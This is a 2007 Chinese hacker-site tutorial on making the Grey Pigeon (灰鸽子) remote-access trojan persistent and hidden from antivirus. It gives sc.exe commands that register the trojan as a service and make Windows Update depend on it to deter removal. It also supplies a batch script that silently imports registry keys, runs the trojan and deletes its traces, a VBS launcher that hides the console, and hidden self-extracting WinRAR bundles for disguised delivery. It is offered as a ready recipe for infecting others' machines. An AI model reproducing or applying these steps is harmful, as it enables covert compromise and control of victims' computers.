| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> Hack >> 新手入门 >> 正文 用户登录 新用户注册
简单打造不死鸽子         ★★★ 【字体:
简单打造不死鸽子
作者:不详 文章来源:华盟收集 点击数: 更新时间:2007-7-4
    这个方法在官方出专杀不久,我自己是根据Radmin配置得到的灵感,没什么技术含量,一直不敢说出来怕大家笑话,老鸟就不用看了  

   废话少说现在讲下正题:

我们的目标是:

     过官方专杀,过咔吧主动防御 的不死神鸽

准备工具:

       鸽子服务端

       IcoSprite图标更改器;

       SC.exe服务添加删除更改工具;

       winrar

程序特点:

自解压形式,双击即可

制作过程:
   1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。其他的随你个人爱好。
  
   2.用SC创建一个服务
    
     运行CMD.EXE 在system32的目录下运行执行
    
     SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"
‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为 own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
    
     sc.exe descript_ion huigezi "不死鸽子"
‘这句是将huigezi服务的描述改为“不死鸽子
    
     sc config wuauserv depend= huigezi
‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
    
     这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
  
   3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg
  
   4.创建一个BAT文件,并命名为update.bat

@regedit /s %systemroot%\system32\1.reg
@%systemroot%\system32\gezi.exe
@del /q /f /s %systemroot%\system32\1.reg
@del /q /f /s %systemroot%\system32\Update.vbs
@del /q /f /s %systemroot%\system32\Update.bat
  
   5.创建一个vbs并命名为update.vbs
  
     目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。

里面写上如下代码:

On Error Resume Next
set wshshell=createobject ("wscript_.shell")
a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)
  
   6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。
    
   记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。八仙过海....
  
   7.将gezi.exe   1.reg Update.vbs   Update.bat 再用winrar制作一个自解压文件,解压到%systemroot%\system32\ 解压后运行Update.vbs
    
     当然解压模式依旧全部隐藏,替换同名文件

     现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机

   这个方法可以用到其他的木马

   捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"
责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客:
    • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    		 * 游客填写  ·注册用户
    主 页:
    评 分:
    		 1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
    • 最新hack更新
    最新推荐资讯
    相关黑客
    动手编写简单远程控制
    入侵博客入侵太简单了
    ActiveX Exploit简单构造
    无xp_cmdshell下取权限
    对FCBLOG的简单分析
    入侵博客入侵太简单了
    社工简单案例找MM记
    Html Injection一些简单想法描述
    将Firefox打造成一个渗透测试平台
    入侵之简单通俗的讲解
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号